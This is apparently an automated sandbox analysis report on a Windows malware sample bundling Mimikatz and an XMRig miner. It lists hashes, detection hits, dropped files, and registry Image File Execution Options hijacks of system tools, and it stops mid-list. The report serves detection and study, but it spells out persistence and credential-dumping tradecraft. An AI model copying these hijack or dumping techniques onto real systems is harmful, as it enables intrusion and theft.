Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2024 00:53
Behavioral task
behavioral1
Sample
2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe
-
Size
10.0MB
-
MD5
c8daa95c0d047647009feb1230136fcb
-
SHA1
4ef98e2e40bc29447538f031ba2e997ff64b6754
-
SHA256
b00980aa20b01bc3baf35ae890fe80a5604e856c96b50645fec1623c19521457
-
SHA512
3c1caae65a9379556557c680172108697fcf1bd1fa0b7edfd2ce572e3709f90b0b04b77bcf52c778127dca2dced9350f4fd9b81d1662db1767e34622a05cbdcf
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3124 created 1012 3124 pnreyic.exe 37 -
Xmrig family
-
Contacts a large (30202) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2028-178-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-182-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-199-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-212-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-225-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-234-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-249-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-498-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-499-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-501-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-756-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig behavioral2/memory/2028-757-0x00007FF744970000-0x00007FF744A90000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2968-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2968-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000d000000023b49-6.dat mimikatz behavioral2/memory/368-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2520-138-0x00007FF6B8240000-0x00007FF6B832E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts pnreyic.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts pnreyic.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe pnreyic.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4932 netsh.exe 4976 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 368 pnreyic.exe 3124 pnreyic.exe 1516 wpcap.exe 2864 ttsqkuccf.exe 2520 vfshost.exe 1260 cntrtrctt.exe 4712 xohudmc.exe 2204 vanpws.exe 2028 zergmt.exe 1344 cntrtrctt.exe 1156 cntrtrctt.exe 772 cntrtrctt.exe 1064 cntrtrctt.exe 1100 cntrtrctt.exe 1620 cntrtrctt.exe 3220 cntrtrctt.exe 2248 cntrtrctt.exe 1684 cntrtrctt.exe 3860 cntrtrctt.exe 3004 cntrtrctt.exe 4312 pnreyic.exe 216 cntrtrctt.exe 1832 cntrtrctt.exe 3600 cntrtrctt.exe 2468 cntrtrctt.exe 2688 cntrtrctt.exe 4440 cntrtrctt.exe 4460 ncgcflyve.exe 1800 pnreyic.exe -
Loads dropped DLL 12 IoCs
pid Process 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 1516 wpcap.exe 2864 ttsqkuccf.exe 2864 ttsqkuccf.exe 2864 ttsqkuccf.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 64 ifconfig.me 65 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 pnreyic.exe File opened for modification C:\Windows\SysWOW64\vanpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 pnreyic.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\vanpws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache pnreyic.exe -
resource yara_rule behavioral2/files/0x0007000000023c7d-136.dat upx behavioral2/memory/2520-135-0x00007FF6B8240000-0x00007FF6B832E000-memory.dmp upx behavioral2/memory/2520-138-0x00007FF6B8240000-0x00007FF6B832E000-memory.dmp upx behavioral2/files/0x0007000000023c88-141.dat upx behavioral2/memory/1260-142-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/1260-146-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-164-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/files/0x0007000000023c85-163.dat upx behavioral2/memory/1344-171-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/1156-175-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-178-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/772-180-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-182-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/1064-185-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/1100-189-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/1620-193-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/3220-197-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-199-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2248-202-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/1684-206-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/3860-210-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-212-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/3004-215-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/216-223-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-225-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/1832-228-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/3600-231-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2468-233-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-234-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2688-236-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/4440-238-0x00007FF705FC0000-0x00007FF70601B000-memory.dmp upx behavioral2/memory/2028-249-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2028-498-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2028-499-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2028-501-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2028-756-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx behavioral2/memory/2028-757-0x00007FF744970000-0x00007FF744A90000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nblmptktz\UnattendGC\specials\trch-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.xml pnreyic.exe File opened for modification C:\Windows\nblmptktz\etgfqftjv\Result.txt ncgcflyve.exe File opened for modification C:\Windows\nblmptktz\etgfqftjv\Packet.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\posh-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\ssleay32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\tibe-2.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\ucl.dll pnreyic.exe File created C:\Windows\hrmeszcf\schoedcl.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ip.txt pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\scan.bat pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\zlib1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\AppCapture64.dll pnreyic.exe File created C:\Windows\nblmptktz\Corporate\vfshost.exe pnreyic.exe File created C:\Windows\ime\pnreyic.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\Packet.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.xml pnreyic.exe File created C:\Windows\hrmeszcf\vimpcsvc.xml pnreyic.exe File created C:\Windows\hrmeszcf\docmicfg.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\cnli-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\vimpcsvc.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\upbdrjv\swrpwe.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\tucl-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\svschost.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.exe pnreyic.exe File opened for modification C:\Windows\hrmeszcf\docmicfg.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\wpcap.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\wpcap.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\svschost.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\vimpcsvc.xml pnreyic.exe File created C:\Windows\hrmeszcf\pnreyic.exe 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe File created C:\Windows\nblmptktz\UnattendGC\specials\coli-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\crli-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\xdvl-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.exe pnreyic.exe File opened for modification C:\Windows\nblmptktz\Corporate\log.txt cmd.exe File created C:\Windows\nblmptktz\UnattendGC\specials\libeay32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\libxml2.dll pnreyic.exe File created C:\Windows\hrmeszcf\svschost.xml pnreyic.exe File created C:\Windows\hrmeszcf\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\Corporate\mimidrv.sys pnreyic.exe File opened for modification C:\Windows\hrmeszcf\pnreyic.exe 2024-12-28_c8daa95c0d047647009feb1230136fcb_hacktools_icedid_mimikatz.exe File created C:\Windows\nblmptktz\UnattendGC\specials\exma-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\AppCapture32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\trfo-2.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\Shellcode.ini pnreyic.exe File created C:\Windows\nblmptktz\Corporate\mimilib.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\docmicfg.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\svschost.xml pnreyic.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3868 sc.exe 4844 sc.exe 2128 sc.exe 3684 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key 